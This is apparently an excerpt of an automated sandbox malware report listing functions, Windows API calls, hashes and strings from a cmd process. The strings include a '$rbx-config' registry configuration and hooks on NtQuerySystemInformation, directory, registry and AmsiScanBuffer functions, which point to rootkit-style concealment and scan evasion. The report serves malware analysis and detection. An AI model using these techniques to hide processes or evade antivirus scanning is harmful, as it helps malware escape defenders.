FindFirstFileExW.KERNEL32 ref: 0000022123C5DB99
FindNextFileW.KERNEL32 ref: 0000022123C5DCCF
FindClose.KERNEL32 ref: 0000022123C5DD0F
FindClose.KERNEL32 ref: 0000022123C5DD3B

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: b1b595e2bd225bfb28b897068665a27220f512ebfbfefbd470a7931d016fb42e
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 27A1E4227047A8E9FB209BB5B44CBAD7BA1E7A1794F146217EE453F6D9CA34C4F18700

Function 0000022123C2DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000022123C2DB99
FindNextFileW.KERNEL32 ref: 0000022123C2DCCF
FindClose.KERNEL32 ref: 0000022123C2DD0F
FindClose.KERNEL32 ref: 0000022123C2DD3B

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 34fab814b6c90c4726c74b21a03e5ece2bba5bff11add259d62f9b2bdc265b5f
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 42A117227046A8E9FB20DBB5A44CBAD6BA0E771794F146217FE6D2F695CA34C4F1C300

Function 0000022123C28090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000022123C280BC
GetCurrentThreadId.KERNEL32 ref: 0000022123C280CA
GetCurrentProcessId.KERNEL32 ref: 0000022123C280D6
QueryPerformanceCounter.KERNEL32 ref: 0000022123C280E6

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 3dfd9ff183b9b48db57b01c2c04703e1105b918b8d525c14942d64cbf3f54b05
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: E7115626714F14D9EB00CFA0E8587A833A4F729758F441F22EE5D467A4DF78C1B48340

Function 0000022123C5D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 0000022123C5D220: HeapAlloc.KERNEL32(?,?,00000000,0000022123C5C987), ref: 0000022123C5D275

Part of subcall function 0000022123C60EB8: _invalid_parameter_noinfo.LIBCMT ref: 0000022123C60EEB

FindFirstFileExW.KERNEL32 ref: 0000022123C5DB99

Part of subcall function 0000022123C5D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000022123C5674A), ref: 0000022123C5D2B6
Part of subcall function 0000022123C5D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000022123C5674A), ref: 0000022123C5D2C0

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 6d9913bf456140959ef170a021a4ac59f72eb390f09e0be6a0a642fff34fc917
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: 4E81E3223047A4E5EB20DBA5B44CB5EA791E3A4BA0F045327FE992B7D5DF38C0B18700

Function 0000022123C2D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 0000022123C2D220: HeapAlloc.KERNEL32(?,?,00000000,0000022123C2C987), ref: 0000022123C2D275

Part of subcall function 0000022123C30EB8: _invalid_parameter_noinfo.LIBCMT ref: 0000022123C30EEB

FindFirstFileExW.KERNEL32 ref: 0000022123C2DB99

Part of subcall function 0000022123C2D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000022123C2674A), ref: 0000022123C2D2B6
Part of subcall function 0000022123C2D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000022123C2674A), ref: 0000022123C2D2C0

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 2436724071-0
Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction ID: 59d1e35df3c4169da7f2d11e1948799ba33f3385bc0af39e4cfe7e27fe5f045f
Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
Instruction Fuzzy Hash: 7381E8223047A4E5EB20DBA6A45CB5EA791E774790F145317BEBD0B795DE38C4B18700

Function 0000022123BF23F0 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 21f9d6cf62bb6e2c44083fd29e4b0049b085507b04aab111736da0d490e0a311
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 10B1EA356206B0E3EB79AFA5D418BA963A4F764B84F106216FE095F794DF36CC60C780

Function 0000022123BC23F0 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 6cd62003fccc2fc9e927c8edb48320134716b0ab66f84c5580882ae44c2bbf7e
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 6AB1E1226206A0EAEF79EFA5D458B9963A4F764F84F005626FE095F794DF34CC60C740

Function 0000022123BFCE18 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction ID: 54cb2694a25d265f049f54e97fc06e126f0fb209f1e7c64dd22748ce6d71880d
Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction Fuzzy Hash: ABA13E227046A0E7FB30FFB5D448BAD6BA0E751B94F146216FD491FB99DA35C4A1C700

Function 0000022123BCCE18 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction ID: 004a697452b2d0edf61e2ba6f4bfba6f55c91c2e4ec45db5e3508326936af024
Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
Instruction Fuzzy Hash: CEA15E227006A1EDFB30EFF5D458BAD6BA0E361B95F144616FD992F6A5DA38C463C300

Function 0000022123BFCC94 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction ID: b00d0d2af54d559108ec1112037bd6c6882dd20b225c40f1706a0f943773945a
Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction Fuzzy Hash: 1A81FC323046A0E7EB30EFA1A444B5EA791E795B95F045325FE9D4BB95DF39C0A1C700

Function 0000022123BCCC94 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction ID: c744a767a516ebd6248d4df4e6b383818bd4eb135b6c85eca5ebe6eab7eaa263
Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
Instruction Fuzzy Hash: 3F81FA32300660E9EB30EFA1A458B9E6791E3B5B91F044B25FE9D4B7A5DF38C0638700

Function 0000022123C02AF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction ID: ec18ff5b12516f3a03b1385d03db2a374f41db27e1386f22320c00a4fcdd7e1e
Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
Instruction Fuzzy Hash: 921169B16245E8D6F7A98F69945972977D0E315384F40521AEC898EB98C73DC4F15F00

Function 0000022123C51724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000022123C5172F
HeapAlloc.KERNEL32 ref: 0000022123C5173E

Part of subcall function 0000022123C51264: GetProcessHeap.KERNEL32 ref: 0000022123C5126A
Part of subcall function 0000022123C51264: HeapAlloc.KERNEL32 ref: 0000022123C51279
Part of subcall function 0000022123C51264: GetProcessHeap.KERNEL32 ref: 0000022123C51293
Part of subcall function 0000022123C51264: HeapAlloc.KERNEL32 ref: 0000022123C512A4

Part of subcall function 0000022123C51000: GetProcessHeap.KERNEL32 ref: 0000022123C51006
Part of subcall function 0000022123C51000: HeapAlloc.KERNEL32 ref: 0000022123C51015
Part of subcall function 0000022123C51000: GetProcessHeap.KERNEL32 ref: 0000022123C51028
Part of subcall function 0000022123C51000: HeapAlloc.KERNEL32 ref: 0000022123C51037

RegOpenKeyExW.ADVAPI32 ref: 0000022123C517AE
RegOpenKeyExW.ADVAPI32 ref: 0000022123C517DB
RegCloseKey.ADVAPI32 ref: 0000022123C517F5
RegOpenKeyExW.ADVAPI32 ref: 0000022123C51815
RegCloseKey.ADVAPI32 ref: 0000022123C51830
RegOpenKeyExW.ADVAPI32 ref: 0000022123C51850
RegCloseKey.ADVAPI32 ref: 0000022123C5186B
RegOpenKeyExW.ADVAPI32 ref: 0000022123C5188B
RegCloseKey.ADVAPI32 ref: 0000022123C518A6
RegOpenKeyExW.ADVAPI32 ref: 0000022123C518C6
RegCloseKey.ADVAPI32 ref: 0000022123C518E1
RegOpenKeyExW.ADVAPI32 ref: 0000022123C51901
RegCloseKey.ADVAPI32 ref: 0000022123C5191C
RegOpenKeyExW.ADVAPI32 ref: 0000022123C5193C
RegCloseKey.ADVAPI32 ref: 0000022123C51957
RegOpenKeyExW.ADVAPI32 ref: 0000022123C51977
RegCloseKey.ADVAPI32 ref: 0000022123C51992
RegCloseKey.ADVAPI32 ref: 0000022123C5199C

Part of subcall function 0000022123C512B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000022123C51315
Part of subcall function 0000022123C512B8: GetProcessHeap.KERNEL32 ref: 0000022123C51323
Part of subcall function 0000022123C512B8: HeapAlloc.KERNEL32 ref: 0000022123C51334
Part of subcall function 0000022123C512B8: RegEnumValueW.ADVAPI32 ref: 0000022123C51393
Part of subcall function 0000022123C512B8: GetProcessHeap.KERNEL32 ref: 0000022123C513DB
Part of subcall function 0000022123C512B8: HeapAlloc.KERNEL32 ref: 0000022123C513E9
Part of subcall function 0000022123C512B8: GetProcessHeap.KERNEL32 ref: 0000022123C51406
Part of subcall function 0000022123C512B8: HeapFree.KERNEL32 ref: 0000022123C51414
Part of subcall function 0000022123C512B8: lstrlenW.KERNEL32 ref: 0000022123C5141D
Part of subcall function 0000022123C512B8: GetProcessHeap.KERNEL32 ref: 0000022123C5142B
Part of subcall function 0000022123C512B8: HeapAlloc.KERNEL32 ref: 0000022123C51439

Strings

process_names, xrefs: 0000022123C51849
service_names, xrefs: 0000022123C518BF
pid, xrefs: 0000022123C5180E
udp, xrefs: 0000022123C51970
tcp_local, xrefs: 0000022123C518FA
SOFTWARE\$rbx-config, xrefs: 0000022123C5178E
startup, xrefs: 0000022123C517D1
paths, xrefs: 0000022123C51884
tcp_remote, xrefs: 0000022123C51935

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 0ca92fbbf1778aabb2b847d9b972d7a044a09208d2cc7ef89be218993f5c622d
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 06714336310E68D9EB109FA6E858A9D2364FBE4B88F406213EE4D5B758DF34C4B5D740

Function 0000022123C21724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000022123C2172F
HeapAlloc.KERNEL32 ref: 0000022123C2173E

Part of subcall function 0000022123C21264: GetProcessHeap.KERNEL32 ref: 0000022123C2126A
Part of subcall function 0000022123C21264: HeapAlloc.KERNEL32 ref: 0000022123C21279
Part of subcall function 0000022123C21264: GetProcessHeap.KERNEL32 ref: 0000022123C21293
Part of subcall function 0000022123C21264: HeapAlloc.KERNEL32 ref: 0000022123C212A4

Part of subcall function 0000022123C21000: GetProcessHeap.KERNEL32 ref: 0000022123C21006
Part of subcall function 0000022123C21000: HeapAlloc.KERNEL32 ref: 0000022123C21015
Part of subcall function 0000022123C21000: GetProcessHeap.KERNEL32 ref: 0000022123C21028
Part of subcall function 0000022123C21000: HeapAlloc.KERNEL32 ref: 0000022123C21037

RegOpenKeyExW.ADVAPI32 ref: 0000022123C217AE
RegOpenKeyExW.ADVAPI32 ref: 0000022123C217DB
RegCloseKey.ADVAPI32 ref: 0000022123C217F5
RegOpenKeyExW.ADVAPI32 ref: 0000022123C21815
RegCloseKey.ADVAPI32 ref: 0000022123C21830
RegOpenKeyExW.ADVAPI32 ref: 0000022123C21850
RegCloseKey.ADVAPI32 ref: 0000022123C2186B
RegOpenKeyExW.ADVAPI32 ref: 0000022123C2188B
RegCloseKey.ADVAPI32 ref: 0000022123C218A6
RegOpenKeyExW.ADVAPI32 ref: 0000022123C218C6
RegCloseKey.ADVAPI32 ref: 0000022123C218E1
RegOpenKeyExW.ADVAPI32 ref: 0000022123C21901
RegCloseKey.ADVAPI32 ref: 0000022123C2191C
RegOpenKeyExW.ADVAPI32 ref: 0000022123C2193C
RegCloseKey.ADVAPI32 ref: 0000022123C21957
RegOpenKeyExW.ADVAPI32 ref: 0000022123C21977
RegCloseKey.ADVAPI32 ref: 0000022123C21992
RegCloseKey.ADVAPI32 ref: 0000022123C2199C

Part of subcall function 0000022123C212B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000022123C21315
Part of subcall function 0000022123C212B8: GetProcessHeap.KERNEL32 ref: 0000022123C21323
Part of subcall function 0000022123C212B8: HeapAlloc.KERNEL32 ref: 0000022123C21334
Part of subcall function 0000022123C212B8: RegEnumValueW.ADVAPI32 ref: 0000022123C21393
Part of subcall function 0000022123C212B8: GetProcessHeap.KERNEL32 ref: 0000022123C213DB
Part of subcall function 0000022123C212B8: HeapAlloc.KERNEL32 ref: 0000022123C213E9
Part of subcall function 0000022123C212B8: GetProcessHeap.KERNEL32 ref: 0000022123C21406
Part of subcall function 0000022123C212B8: HeapFree.KERNEL32 ref: 0000022123C21414
Part of subcall function 0000022123C212B8: lstrlenW.KERNEL32 ref: 0000022123C2141D
Part of subcall function 0000022123C212B8: GetProcessHeap.KERNEL32 ref: 0000022123C2142B
Part of subcall function 0000022123C212B8: HeapAlloc.KERNEL32 ref: 0000022123C21439

Strings

udp, xrefs: 0000022123C21970
tcp_remote, xrefs: 0000022123C21935
service_names, xrefs: 0000022123C218BF
pid, xrefs: 0000022123C2180E
tcp_local, xrefs: 0000022123C218FA
SOFTWARE\$rbx-config, xrefs: 0000022123C2178E
startup, xrefs: 0000022123C217D1
process_names, xrefs: 0000022123C21849
paths, xrefs: 0000022123C21884

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 856824a6bdfbc25d9a4fb2d4b4d30d9a1fe39f44cc48671294289c762c82e5de
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 3E713036310A68E5EB109FA6E898A9D2364FBA4B88F406213FD4D5B728DF35C5B5C340

Function 0000022123C21E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000022123C21E7F

Part of subcall function 0000022123C222A8: GetModuleHandleA.KERNEL32(?,?,?,0000022123C21EB1), ref: 0000022123C222C0
Part of subcall function 0000022123C222A8: GetProcAddress.KERNEL32(?,?,?,0000022123C21EB1), ref: 0000022123C222D1

CreateThread.KERNEL32 ref: 0000022123C22043
TlsAlloc.KERNEL32 ref: 0000022123C22049
TlsAlloc.KERNEL32 ref: 0000022123C22055
TlsAlloc.KERNEL32 ref: 0000022123C22061
TlsAlloc.KERNEL32 ref: 0000022123C2206D
TlsAlloc.KERNEL32 ref: 0000022123C22079
TlsAlloc.KERNEL32 ref: 0000022123C22085

Strings

EnumServicesStatusExW, xrefs: 0000022123C21F71, 0000022123C21F92
AmsiScanBuffer, xrefs: 0000022123C22012
PdhGetRawCounterArrayW, xrefs: 0000022123C21FD0
NtEnumerateKey, xrefs: 0000022123C21F19
NtResumeThread, xrefs: 0000022123C21EC2
NtQueryDirectoryFile, xrefs: 0000022123C21EDF
PdhGetFormattedCounterArrayW, xrefs: 0000022123C21FF1
sechost.dll, xrefs: 0000022123C21F99
advapi32.dll, xrefs: 0000022123C21F57, 0000022123C21F78
NtDeviceIoControlFile, xrefs: 0000022123C21FB6
EnumServiceGroupW, xrefs: 0000022123C21F50
ntdll.dll, xrefs: 0000022123C21E8D
pdh.dll, xrefs: 0000022123C21FD7, 0000022123C21FF8
NtEnumerateValueKey, xrefs: 0000022123C21F36
NtQuerySystemInformation, xrefs: 0000022123C21EA5
NtQueryDirectoryFileEx, xrefs: 0000022123C21EFC
amsi.dll, xrefs: 0000022123C22019

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 58123b38155f9b244377e9b86cdc6b4ab3ddc16cae1c5cf0585c3fef8d008fee
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 8C517060520A6EF5EB40EBE4EC49FD83720E760754F80A713BD491B665DE7982FAC380

Function 0000022123C512B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000022123C51315
GetProcessHeap.KERNEL32 ref: 0000022123C51323
HeapAlloc.KERNEL32 ref: 0000022123C51334
RegEnumValueW.ADVAPI32 ref: 0000022123C51393

Part of subcall function 0000022123C51530: StrCmpIW.SHLWAPI ref: 0000022123C51561

GetProcessHeap.KERNEL32 ref: 0000022123C513DB
HeapAlloc.KERNEL32 ref: 0000022123C513E9
GetProcessHeap.KERNEL32 ref: 0000022123C51406
HeapFree.KERNEL32 ref: 0000022123C51414
lstrlenW.KERNEL32 ref: 0000022123C5141D
GetProcessHeap.KERNEL32 ref: 0000022123C5142B
HeapAlloc.KERNEL32 ref: 0000022123C51439
StrCpyW.SHLWAPI ref: 0000022123C5145B
GetProcessHeap.KERNEL32 ref: 0000022123C51472
HeapFree.KERNEL32 ref: 0000022123C51480

Strings

d, xrefs: 0000022123C51356

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
